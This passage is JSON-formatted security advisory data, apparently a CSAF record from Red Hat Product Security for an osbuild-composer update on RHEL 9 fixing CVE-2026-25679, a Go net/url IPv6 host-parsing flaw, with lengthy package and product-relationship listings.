host literals in net/url"}], "containers": {"cna": {"x_gcve": [{"recordType": "advisory", "vulnId": "rhsa-2026:9090"}]}}}, {"document": {"aggregate_severity": {"namespace": "https://access.redhat.com/security/updates/classification/", "text": "Important"}, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": {"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": {"label": "WHITE", "url": "https://www.first.org/tlp/"}}, "lang": "en", "notes": [{"category": "summary", "text": "An update for osbuild-composer is now available for Red Hat Enterprise Linux 9.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic"}, {"category": "general", "text": "A service for building customized OS artifacts, such as VM images and OSTree commits, that uses osbuild under the hood. Besides building images for local usage, it can also upload images directly to cloud.  It is compatible with composer-cli and cockpit-composer clients.\n\nSecurity Fix(es):\n\n* net/url: Incorrect parsing of IPv6 host literals in net/url (CVE-2026-25679)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details"}, {"category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", "title": "Terms of Use"}], "publisher": {"category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com"}, "references": [{"category": "self", "summary": "https://access.redhat.com/errata/RHSA-2026:9044", "url": "https://access.redhat.com/errata/RHSA-2026:9044"}, {"category": "external", "summary": "https://access.redhat.com/security/updates/classification/#important", "url": "https://access.redhat.com/security/updates/classification/#important"}, {"category": "external", "summary": "2445356", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445356"}, {"category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_9044.json"}], "title": "Red Hat Security Advisory: osbuild-composer security update", "tracking": {"current_release_date": "2026-06-08T15:52:49+00:00", "generator": {"date": "2026-06-08T15:52:49+00:00", "engine": {"name": "Red Hat SDEngine", "version": "4.8.2"}}, "id": "RHSA-2026:9044", "initial_release_date": "2026-04-20T14:26:01+00:00", "revision_history": [{"date": "2026-04-20T14:26:01+00:00", "number": "1", "summary": "Initial version"}, {"date": "2026-04-20T14:26:01+00:00", "number": "2", "summary": "Last updated version"}, {"date": "2026-06-08T15:52:49+00:00", "number": "3", "summary": "Last generated version"}], "status": "final", "version": "3"}}, "product_tree": {"branches": [{"branches": [{"branches": [{"category": "product_name", "name": "Red Hat Enterprise Linux AppStream (v. 9)", "product": {"name": "Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.7.0.Z.MAIN", "product_identification_helper": {"cpe": "cpe:/a:redhat:enterprise_linux:9::appstream"}}}], "category": "product_family", "name": "Red Hat Enterprise Linux"}, {"branches": [{"category": "product_version", "name": "osbuild-composer-0:149-5.el9_7.src", "product": {"name": "osbuild-composer-0:149-5.el9_7.src", "product_id": "osbuild-composer-0:149-5.el9_7.src", "product_identification_helper": {"purl": "pkg:rpm/redhat/osbuild-composer@149-5.el9_7?arch=src"}}}], "category": "architecture", "name": "src"}, {"branches": [{"category": "product_version", "name": "osbuild-composer-0:149-5.el9_7.aarch64", "product": {"name": "osbuild-composer-0:149-5.el9_7.aarch64", "product_id": "osbuild-composer-0:149-5.el9_7.aarch64", "product_identification_helper": {"purl": "pkg:rpm/redhat/osbuild-composer@149-5.el9_7?arch=aarch64"}}}, {"category": "product_version", "name": "osbuild-composer-core-0:149-5.el9_7.aarch64", "product": {"name": "osbuild-composer-core-0:149-5.el9_7.aarch64", "product_id": "osbuild-composer-core-0:149-5.el9_7.aarch64", "product_identification_helper": {"purl": "pkg:rpm/redhat/osbuild-composer-core@149-5.el9_7?arch=aarch64"}}}, {"category": "product_version", "name": "osbuild-composer-worker-0:149-5.el9_7.aarch64", "product": {"name": "osbuild-composer-worker-0:149-5.el9_7.aarch64", "product_id": "osbuild-composer-worker-0:149-5.el9_7.aarch64", "product_identification_helper": {"purl": "pkg:rpm/redhat/osbuild-composer-worker@149-5.el9_7?arch=aarch64"}}}, {"category": "product_version", "name": "osbuild-composer-debugsource-0:149-5.el9_7.aarch64", "product": {"name": "osbuild-composer-debugsource-0:149-5.el9_7.aarch64", "product_id": "osbuild-composer-debugsource-0:149-5.el9_7.aarch64", "product_identification_helper": {"purl": "pkg:rpm/redhat/osbuild-composer-debugsource@149-5.el9_7?arch=aarch64"}}}, {"category": "product_version", "name": "osbuild-composer-core-debuginfo-0:149-5.el9_7.aarch64", "product": {"name": "osbuild-composer-core-debuginfo-0:149-5.el9_7.aarch64", "product_id": "osbuild-composer-core-debuginfo-0:149-5.el9_7.aarch64", "product_identification_helper": {"purl": "pkg:rpm/redhat/osbuild-composer-core-debuginfo@149-5.el9_7?arch=aarch64"}}}, {"category": "product_version", "name": "osbuild-composer-debuginfo-0:149-5.el9_7.aarch64", "product": {"name": "osbuild-composer-debuginfo-0:149-5.el9_7.aarch64", "product_id": "osbuild-composer-debuginfo-0:149-5.el9_7.aarch64", "product_identification_helper": {"purl": "pkg:rpm/redhat/osbuild-composer-debuginfo@149-5.el9_7?arch=aarch64"}}}, {"category": "product_version", "name": "osbuild-composer-tests-debuginfo-0:149-5.el9_7.aarch64", "product": {"name": "osbuild-composer-tests-debuginfo-0:149-5.el9_7.aarch64", "product_id": "osbuild-composer-tests-debuginfo-0:149-5.el9_7.aarch64", "product_identification_helper": {"purl": "pkg:rpm/redhat/osbuild-composer-tests-debuginfo@149-5.el9_7?arch=aarch64"}}}, {"category": "product_version", "name": "osbuild-composer-worker-debuginfo-0:149-5.el9_7.aarch64", "product": {"name": "osbuild-composer-worker-debuginfo-0:149-5.el9_7.aarch64", "product_id": "osbuild-composer-worker-debuginfo-0:149-5.el9_7.aarch64", "product_identification_helper": {"purl": "pkg:rpm/redhat/osbuild-composer-worker-debuginfo@149-5.el9_7?arch=aarch64"}}}], "category": "architecture", "name": "aarch64"}, {"branches": [{"category": "product_version", "name": "osbuild-composer-0:149-5.el9_7.ppc64le", "product": {"name": "osbuild-composer-0:149-5.el9_7.ppc64le", "product_id": "osbuild-composer-0:149-5.el9_7.ppc64le", "product_identification_helper": {"purl": "pkg:rpm/redhat/osbuild-composer@149-5.el9_7?arch=ppc64le"}}}, {"category": "product_version", "name": "osbuild-composer-core-0:149-5.el9_7.ppc64le", "product": {"name": "osbuild-composer-core-0:149-5.el9_7.ppc64le", "product_id": "osbuild-composer-core-0:149-5.el9_7.ppc64le", "product_identification_helper": {"purl": "pkg:rpm/redhat/osbuild-composer-core@149-5.el9_7?arch=ppc64le"}}}, {"category": "product_version", "name": "osbuild-composer-worker-0:149-5.el9_7.ppc64le", "product": {"name": "osbuild-composer-worker-0:149-5.el9_7.ppc64le", "product_id": "osbuild-composer-worker-0:149-5.el9_7.ppc64le", "product_identification_helper": {"purl": "pkg:rpm/redhat/osbuild-composer-worker@149-5.el9_7?arch=ppc64le"}}}, {"category": "product_version", "name": "osbuild-composer-debugsource-0:149-5.el9_7.ppc64le", "product": {"name": "osbuild-composer-debugsource-0:149-5.el9_7.ppc64le", "product_id": "osbuild-composer-debugsource-0:149-5.el9_7.ppc64le", "product_identification_helper": {"purl": "pkg:rpm/redhat/osbuild-composer-debugsource@149-5.el9_7?arch=ppc64le"}}}, {"category": "product_version", "name": "osbuild-composer-core-debuginfo-0:149-5.el9_7.ppc64le", "product": {"name": "osbuild-composer-core-debuginfo-0:149-5.el9_7.ppc64le", "product_id": "osbuild-composer-core-debuginfo-0:149-5.el9_7.ppc64le", "product_identification_helper": {"purl": "pkg:rpm/redhat/osbuild-composer-core-debuginfo@149-5.el9_7?arch=ppc64le"}}}, {"category": "product_version", "name": "osbuild-composer-debuginfo-0:149-5.el9_7.ppc64le", "product": {"name": "osbuild-composer-debuginfo-0:149-5.el9_7.ppc64le", "product_id": "osbuild-composer-debuginfo-0:149-5.el9_7.ppc64le", "product_identification_helper": {"purl": "pkg:rpm/redhat/osbuild-composer-debuginfo@149-5.el9_7?arch=ppc64le"}}}, {"category": "product_version", "name": "osbuild-composer-tests-debuginfo-0:149-5.el9_7.ppc64le", "product": {"name": "osbuild-composer-tests-debuginfo-0:149-5.el9_7.ppc64le", "product_id": "osbuild-composer-tests-debuginfo-0:149-5.el9_7.ppc64le", "product_identification_helper": {"purl": "pkg:rpm/redhat/osbuild-composer-tests-debuginfo@149-5.el9_7?arch=ppc64le"}}}, {"category": "product_version", "name": "osbuild-composer-worker-debuginfo-0:149-5.el9_7.ppc64le", "product": {"name": "osbuild-composer-worker-debuginfo-0:149-5.el9_7.ppc64le", "product_id": "osbuild-composer-worker-debuginfo-0:149-5.el9_7.ppc64le", "product_identification_helper": {"purl": "pkg:rpm/redhat/osbuild-composer-worker-debuginfo@149-5.el9_7?arch=ppc64le"}}}], "category": "architecture", "name": "ppc64le"}, {"branches": [{"category": "product_version", "name": "osbuild-composer-0:149-5.el9_7.x86_64", "product": {"name": "osbuild-composer-0:149-5.el9_7.x86_64", "product_id": "osbuild-composer-0:149-5.el9_7.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/osbuild-composer@149-5.el9_7?arch=x86_64"}}}, {"category": "product_version", "name": "osbuild-composer-core-0:149-5.el9_7.x86_64", "product": {"name": "osbuild-composer-core-0:149-5.el9_7.x86_64", "product_id": "osbuild-composer-core-0:149-5.el9_7.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/osbuild-composer-core@149-5.el9_7?arch=x86_64"}}}, {"category": "product_version", "name": "osbuild-composer-worker-0:149-5.el9_7.x86_64", "product": {"name": "osbuild-composer-worker-0:149-5.el9_7.x86_64", "product_id": "osbuild-composer-worker-0:149-5.el9_7.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/osbuild-composer-worker@149-5.el9_7?arch=x86_64"}}}, {"category": "product_version", "name": "osbuild-composer-debugsource-0:149-5.el9_7.x86_64", "product": {"name": "osbuild-composer-debugsource-0:149-5.el9_7.x86_64", "product_id": "osbuild-composer-debugsource-0:149-5.el9_7.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/osbuild-composer-debugsource@149-5.el9_7?arch=x86_64"}}}, {"category": "product_version", "name": "osbuild-composer-core-debuginfo-0:149-5.el9_7.x86_64", "product": {"name": "osbuild-composer-core-debuginfo-0:149-5.el9_7.x86_64", "product_id": "osbuild-composer-core-debuginfo-0:149-5.el9_7.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/osbuild-composer-core-debuginfo@149-5.el9_7?arch=x86_64"}}}, {"category": "product_version", "name": "osbuild-composer-debuginfo-0:149-5.el9_7.x86_64", "product": {"name": "osbuild-composer-debuginfo-0:149-5.el9_7.x86_64", "product_id": "osbuild-composer-debuginfo-0:149-5.el9_7.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/osbuild-composer-debuginfo@149-5.el9_7?arch=x86_64"}}}, {"category": "product_version", "name": "osbuild-composer-tests-debuginfo-0:149-5.el9_7.x86_64", "product": {"name": "osbuild-composer-tests-debuginfo-0:149-5.el9_7.x86_64", "product_id": "osbuild-composer-tests-debuginfo-0:149-5.el9_7.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/osbuild-composer-tests-debuginfo@149-5.el9_7?arch=x86_64"}}}, {"category": "product_version", "name": "osbuild-composer-worker-debuginfo-0:149-5.el9_7.x86_64", "product": {"name": "osbuild-composer-worker-debuginfo-0:149-5.el9_7.x86_64", "product_id": "osbuild-composer-worker-debuginfo-0:149-5.el9_7.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/osbuild-composer-worker-debuginfo@149-5.el9_7?arch=x86_64"}}}], "category": "architecture", "name": "x86_64"}, {"branches": [{"category": "product_version", "name": "osbuild-composer-0:149-5.el9_7.s390x", "product": {"name": "osbuild-composer-0:149-5.el9_7.s390x", "product_id": "osbuild-composer-0:149-5.el9_7.s390x", "product_identification_helper": {"purl": "pkg:rpm/redhat/osbuild-composer@149-5.el9_7?arch=s390x"}}}, {"category": "product_version", "name": "osbuild-composer-core-0:149-5.el9_7.s390x", "product": {"name": "osbuild-composer-core-0:149-5.el9_7.s390x", "product_id": "osbuild-composer-core-0:149-5.el9_7.s390x", "product_identification_helper": {"purl": "pkg:rpm/redhat/osbuild-composer-core@149-5.el9_7?arch=s390x"}}}, {"category": "product_version", "name": "osbuild-composer-worker-0:149-5.el9_7.s390x", "product": {"name": "osbuild-composer-worker-0:149-5.el9_7.s390x", "product_id": "osbuild-composer-worker-0:149-5.el9_7.s390x", "product_identification_helper": {"purl": "pkg:rpm/redhat/osbuild-composer-worker@149-5.el9_7?arch=s390x"}}}, {"category": "product_version", "name": "osbuild-composer-debugsource-0:149-5.el9_7.s390x", "product": {"name": "osbuild-composer-debugsource-0:149-5.el9_7.s390x", "product_id": "osbuild-composer-debugsource-0:149-5.el9_7.s390x", "product_identification_helper": {"purl": "pkg:rpm/redhat/osbuild-composer-debugsource@149-5.el9_7?arch=s390x"}}}, {"category": "product_version", "name": "osbuild-composer-core-debuginfo-0:149-5.el9_7.s390x", "product": {"name": "osbuild-composer-core-debuginfo-0:149-5.el9_7.s390x", "product_id": "osbuild-composer-core-debuginfo-0:149-5.el9_7.s390x", "product_identification_helper": {"purl": "pkg:rpm/redhat/osbuild-composer-core-debuginfo@149-5.el9_7?arch=s390x"}}}, {"category": "product_version", "name": "osbuild-composer-debuginfo-0:149-5.el9_7.s390x", "product": {"name": "osbuild-composer-debuginfo-0:149-5.el9_7.s390x", "product_id": "osbuild-composer-debuginfo-0:149-5.el9_7.s390x", "product_identification_helper": {"purl": "pkg:rpm/redhat/osbuild-composer-debuginfo@149-5.el9_7?arch=s390x"}}}, {"category": "product_version", "name": "osbuild-composer-tests-debuginfo-0:149-5.el9_7.s390x", "product": {"name": "osbuild-composer-tests-debuginfo-0:149-5.el9_7.s390x", "product_id": "osbuild-composer-tests-debuginfo-0:149-5.el9_7.s390x", "product_identification_helper": {"purl": "pkg:rpm/redhat/osbuild-composer-tests-debuginfo@149-5.el9_7?arch=s390x"}}}, {"category": "product_version", "name": "osbuild-composer-worker-debuginfo-0:149-5.el9_7.s390x", "product": {"name": "osbuild-composer-worker-debuginfo-0:149-5.el9_7.s390x", "product_id": "osbuild-composer-worker-debuginfo-0:149-5.el9_7.s390x", "product_identification_helper": {"purl": "pkg:rpm/redhat/osbuild-composer-worker-debuginfo@149-5.el9_7?arch=s390x"}}}], "category": "architecture", "name": "s390x"}], "category": "vendor", "name": "Red Hat"}], "relationships": [{"category": "default_component_of", "full_product_name": {"name": "osbuild-composer-0:149-5.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.7.0.Z.MAIN:osbuild-composer-0:149-5.el9_7.aarch64"}, "product_reference": "osbuild-composer-0:149-5.el9_7.aarch64", "relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"}, {"category": "default_component_of", "full_product_name": {"name": "osbuild-composer-0:149-5.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.7.0.Z.MAIN:osbuild-composer-0:149-5.el9_7.ppc64le"}, "product_reference": "osbuild-composer-0:149-5.el9_7.ppc64le", "relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"}, {"category": "default_component_of", "full_product_name": {"name": "osbuild-composer-0:149-5.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.7.0.Z.MAIN:osbuild-composer-0:149-5.el9_7.s390x"}, "product_reference": "osbuild-composer-0:149-5.el9_7.s390x", "relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"}, {"category": "default_component_of", "full_product_name": {"name": "osbuild-composer-0:149-5.el9_7.src as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.7.0.Z.MAIN:osbuild-composer-0:149-5.el9_7.src"}, "product_reference": "osbuild-composer-0:149-5.el9_7.src", "relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"}, {"category": "default_component_of", "full_product_name": {"name": "osbuild-composer-0:149-5.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.7.0.Z.MAIN:osbuild-composer-0:149-5.el9_7.x86_64"}, "product_reference": "osbuild-composer-0:149-5.el9_7.x86_64", "relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"}, {"category": "default_component_of", "full_product_name": {"name": "osbuild-composer-core-0:149-5.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.7.0.Z.MAIN:osbuild-composer-core-0:149-5.el9_7.aarch64"}, "product_reference": "osbuild-composer-core-0:149-5.el9_7.aarch64", "relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"}, {"category": "default_component_of", "full_product_name": {"name": "osbuild-composer-core-0:149-5.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.7.0.Z.MAIN:osbuild-composer-core-0:149-5.el9_7.ppc64le"}, "product_reference": "osbuild-composer-core-0:149-5.el9_7.ppc64le", "relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"}, {"category": "default_component_of", "full_product_name": {"name": "osbuild-composer-core-0:149-5.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.7.0.Z.MAIN:osbuild-composer-core-0:149-5.el9_7.s390x"}, "product_reference": "osbuild-composer-core-0:149-5.el9_7.s390x", "relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"}, {"category": "default_component_of", "full_product_name": {"name": "osbuild-composer-core-0:149-5.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.7.0.Z.MAIN:osbuild-composer-core-0:149-5.el9_7.x86_64"}, "product_reference": "osbuild-composer-core-0:149-5.el9_7.x86_64", "relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"}, {"category": "default_component_of", "full_product_name": {"name": "osbuild-composer-core-debuginfo-0:149-5.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.7.0.Z.MAIN:osbuild-composer-core-debuginfo-0:149-5.el9_7.aarch64"}, "product_reference": "osbuild-composer-core-debuginfo-0:149-5.el9_7.aarch64", "relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"}, {"category": "default_component_of", "full_product_name": {"name": "osbuild-composer-core-debuginfo-0:149-5.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.7.0.Z.MAIN:osbuild-composer-core-debuginfo-0:149-5.el9_7.ppc64le"}, "product_reference": "osbuild-composer-core-debuginfo-0:149-5.el9_7.ppc64le", "relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"}, {"category": "default_component_of", "full_product_name": {"name": "osbuild-composer-core-debuginfo-0:149-5.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.7.0.Z.MAIN:osbuild-composer-core-debuginfo-0:149-5.el9_7.s390x"}, "product_reference": "osbuild-composer-core-debuginfo-0:149-5.el9_7.s390x", "relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"}, {"category": "default_component_of", "full_product_name": {"name": "osbuild-composer-core-debuginfo-0:149-5.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.7.0.Z.MAIN:osbuild-composer-core-debuginfo-0:149-5.el9_7.x86_64"}, "product_reference": "osbuild-composer-core-debuginfo-0:149-5.el9_7.x86_64", "relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"}, {"category": "default_component_of", "full_product_name": {"name": "osbuild-composer-debuginfo-0:149-5.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.7.0.Z.MAIN:osbuild-composer-debuginfo-0:149-5.el9_7.aarch64"}, "product_reference": "osbuild-composer-debuginfo-0:149-5.el9_7.aarch64", "relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"}, {"category": "default_component_of", "full_product_name": {"name": "osbuild-composer-debuginfo-0:149-5.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.7.0.Z.MAIN:osbuild-composer-debuginfo-0:149-5.el9_7.ppc64le"}, "product_reference": "osbuild-composer-debuginfo-0:149-5.el9_7.ppc64le", "relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"}, {"category": "default_component_of", "full_product_name": {"name": "osbuild-composer-debuginfo-0:149-5.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.7.0.Z.MAIN:osbuild-composer-debuginfo-0:149-5.el9_7.s390x"}, "product_reference": "osbuild-composer-debuginfo-0:149-5.el9_7.s390x", "relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"}, {"category": "default_component_of", "full_product_name": {"name": "osbuild-composer-debuginfo-0:149-5.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.7.0.Z.MAIN:osbuild-composer-debuginfo-0:149-5.el9_7.x86_64"}, "product_reference": "osbuild-composer-debuginfo-0:149-5.el9_7.x86_64", "relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"}, {"category": "default_component_of", "full_product_name": {"name": "osbuild-composer-debugsource-0:149-5.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.7.0.Z.MAIN:osbuild-composer-debugsource-0:149-5.el9_7.aarch64"}, "product_reference": "osbuild-composer-debugsource-0:149-5.el9_7.aarch64", "relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"}, {"category": "default_component_of", "full_product_name": {"name": "osbuild-composer-debugsource-0:149-5.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.7.0.Z.MAIN:osbuild-composer-debugsource-0:149-5.el9_7.ppc64le"}, "product_reference": "osbuild-composer-debugsource-0:149-5.el9_7.ppc64le", "relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"}, {"category": "default_component_of", "full_product_name": {"name": "osbuild-composer-debugsource-0:149-5.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.7.0.Z.MAIN:osbuild-composer-debugsource-0:149-5.el9_7.s390x"}, "product_reference": "osbuild-composer-debugsource-0:149-5.el9_7.s390x", "relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"}, {"category": "default_component_of", "full_product_name": {"name": "osbuild-composer-debugsource-0:149-5.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.7.0.Z.MAIN:osbuild-composer-debugsource-0:149-5.el9_7.x86_64"}, "product_reference": "osbuild-composer-debugsource-0:149-5.el9_7.x86_64", "relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"}, {"category": "default_component_of", "full_product_name": {"name": "osbuild-composer-tests-debuginfo-0:149-5.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.7.0.Z.MAIN:osbuild-composer-tests-debuginfo-0:149-5.el9_7.aarch64"}, "product_reference": "osbuild-composer-tests-debuginfo-0:149-5.el9_7.aarch64", "relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"}, {"category": "default_component_of", "full_product_name": {"name": "osbuild-composer-tests-debuginfo-0:149-5.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.7.0.Z.MAIN:osbuild-composer-tests-debuginfo-0:149-5.el9_7.ppc64le"}, "product_reference": "osbuild-composer-tests-debuginfo-0:149-5.el9_7.ppc64le", "relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"}, {"category": "default_component_of", "full_product_name": {"name": "osbuild-composer-tests-debuginfo-0:149-5.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.7.0.Z.MAIN:osbuild-composer-tests-debuginfo-0:149-5.el9_7.s390x"}, "product_reference": "osbuild-composer-tests-debuginfo-0:149-5.el9_7.s390x", "relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"}, {"category": "default_component_of", "full_product_name": {"name": "osbuild-composer-tests-debuginfo-0:149-5.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.7.0.Z.MAIN:osbuild-composer-tests-debuginfo-0:149-5.el9_7.x86_64"}, "product_reference": "osbuild-composer-tests-debuginfo-0:149-5.el9_7.x86_64", "relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"}, {"category": "default_component_of", "full_product_name": {"name": "osbuild-composer-worker-0:149-5.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.7.0.Z.MAIN:osbuild-composer-worker-0:149-5.el9_7.aarch64"}, "product_reference": "osbuild-composer-worker-0:149-5.el9_7.aarch64", "relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"}, {"category": "default_component_of", "full_product_name": {"name": "osbuild-composer-worker-0:149-5.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.7.0.Z.MAIN:osbuild-composer-worker-0:149-5.el9_7.ppc64le"}, "product_reference": "osbuild-composer-worker-0:149-5.el9_7.ppc64le", "relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"}, {"category": "default_component_of", "full_product_name": {"name": "osbuild-composer-worker-0:149-5.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.7.0.Z.MAIN:osbuild-composer-worker-0:149-5.el9_7.s390x"}, "product_reference": "osbuild-composer-worker-0:149-5.el9_7.s390x", "relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"}, {"category": "default_component_of", "full_product_name": {"name": "osbuild-composer-worker-0:149-5.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.7.0.Z.MAIN:osbuild-composer-worker-0:149-5.el9_7.x86_64"}, "product_reference": "osbuild-composer-worker-0:149-5.el9_7.x86_64", "relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"}, {"category": "default_component_of", "full_product_name": {"name": "osbuild-composer-worker-debuginfo-0:149-5.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.7.0.Z.MAIN:osbuild-composer-worker-debuginfo-0:149-5.el9_7.aarch64"}, "product_reference": "osbuild-composer-worker-debuginfo-0:149-5.el9_7.aarch64", "relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"}, {"category": "default_component_of", "full_product_name": {"name": "osbuild-composer-worker-debuginfo-0:149-5.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.7.0.Z.MAIN:osbuild-composer-worker-debuginfo-0:149-5.el9_7.ppc64le"}, "product_reference": "osbuild-composer-worker-debuginfo-0:149-5.el9_7.ppc64le", "relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"}, {"category": "default_component_of", "full_product_name": {"name": "osbuild-composer-worker-debuginfo-0:149-5.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.7.0.Z.MAIN:osbuild-composer-worker-debuginfo-0:149-5.el9_7.s390x"}, "product_reference": "osbuild-composer-worker-debuginfo-0:149-5.el9_7.s390x", "relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"}, {"category": "default_component_of", "full_product_name": {"name": "osbuild-composer-worker-debuginfo-0:149-5.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.7.0.Z.MAIN:osbuild-composer-worker-debuginfo-0:149-5.el9_7.x86_64"}, "product_reference": "osbuild-composer-worker-debuginfo-0:149-5.el9_7.x86_64", "relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"}]}, "vulnerabilities": [{"cve": "CVE-2026-25679", "cwe": {"id": "CWE-1286", "name": "Improper Validation of Syntactic Correctness of Input"}, "discovery_date": "2026-03-06T22:02:11.567841+00:00", "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2445356"}], "notes": [{"category": "description", "text": "The Go standard library function net/url.Parse insufficiently validated the host/authority component and accepted some invalid URLs by effectively treating garbage before an IP-literal as ignorable. The function should have rejected this as invalid.", "title": "Vulnerability description"}, {"category": "summary", "text": "net/url: Incorrect parsing of IPv6 host literals in net/url", "title": "Vulnerability summary"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["AppStream-9.7.0.Z.MAIN:osbuild-composer-0:149-5.el9_7.aarch64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-0:149-5.el9_7.ppc64le", "AppStream-9.7.0.Z.MAIN:osbuild-composer-0:149-5.el9_7.s390x", "AppStream-9.7.0.Z.MAIN:osbuild-composer-0:149-5.el9_7.src", "AppStream-9.7.0.Z.MAIN:osbuild-composer-0:149-5.el9_7.x86_64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-core-0:149-5.el9_7.aarch64", "AppStream-9.7.0.Z.MAIN:osbuild-composer-core-0:149-5.el9_7.ppc64le", "AppStream-9.7.0.Z.MAIN:osbuild-composer-core-0:149-5.el9_7.s390x", 